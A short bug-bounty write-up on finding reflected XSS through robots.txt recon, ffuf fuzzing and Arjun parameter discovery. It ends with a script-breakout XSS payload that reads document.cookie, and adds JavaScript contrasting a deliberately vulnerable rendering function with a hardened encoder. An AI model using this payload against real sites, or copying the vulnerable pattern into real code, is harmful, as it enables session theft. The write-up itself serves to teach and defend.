20230311 - How reading robots.txt file got me 4 XSS reports.md

How reading the robots.txt file got me 4 XSS reports 💡💡

1. Started with Google dorking [Found Nothing]

2. Searched for the domain name in the Wayback archive [Found Nothing]

3. Opened the robots.txt file to see what the developer is hiding from us

4. Open the source code > Search for any secrets or endpoints > [Found Nothing]

5. Open JS files > Use any tool like gospider to extract secrets and endpoints > [Found Nothing]

6. Let’s FUZZ

ffuf -u https://sub.domain.com/admin/FUZZ -w aspfiles.txt -mc 200

7. Found Endpoint:

https://sub.domain.com/admin/colorpicker_IEPatch.asp

8. Use Arjun to find hidden parameters

arjun -u https://sub.domain.com/admin/colorpicker_IEPatch.asp

9.

10. Payload:

</script><img src=x onerror=alert(document.cookie)>
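
Why the payload in step 10 works, and the output encoding that stops it, as an added example that is not from the original writeup or the affected site. It assumes the hidden parameter (called `color` here, a hypothetical name) is reflected inside an inline `<script>` block, which the leading `</script>` in the payload suggests but the page does not show.

```javascript
// Added example. Assumption: a query parameter (hypothetical name "color")
// is reflected into an inline <script> block by the server.

// Vulnerable pattern: escapes only for the JavaScript string context.
function renderVulnerable(color) {
  const jsEscaped = String(color).replace(/\\/g, '\\\\').replace(/'/g, "\\'");
  return `<script>var color = '${jsEscaped}';</script>`;
}

// Hardened: JSON-encode, then \u-escape the characters the HTML parser
// acts on, so the value can never close the script element.
function encodeForScript(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g,
    (ch) => '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

function renderHardened(color) {
  return `<script>var color = ${encodeForScript(color)};</script>`;
}

// Simplified model of the HTML tokenizer: a script element ends at the first
// "</script", whatever JavaScript quoting surrounds it. Returns what follows.
function markupAfterFirstScript(html) {
  const close = html.toLowerCase().indexOf('</script');
  if (close === -1) return '';
  return html.slice(html.indexOf('>', close) + 1);
}

// True when the browser would parse attacker-supplied tags as HTML.
function injectsMarkup(html) {
  return /<[a-z]/i.test(markupAfterFirstScript(html));
}

// The payload from step 10, used as test input.
const payload = '</script><img src=x onerror=alert(document.cookie)>';
console.log('vulnerable render leaks markup:', injectsMarkup(renderVulnerable(payload)));
console.log('hardened render leaks markup:  ', injectsMarkup(renderHardened(payload)));
console.log(renderHardened(payload));
```

Quote escaping alone does not help here because the HTML parser ends the script element before the JavaScript string is ever evaluated; the hardened value still decodes to the original string on the client.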

Credit

Based on Ahmed Qaramany's writeup.
 
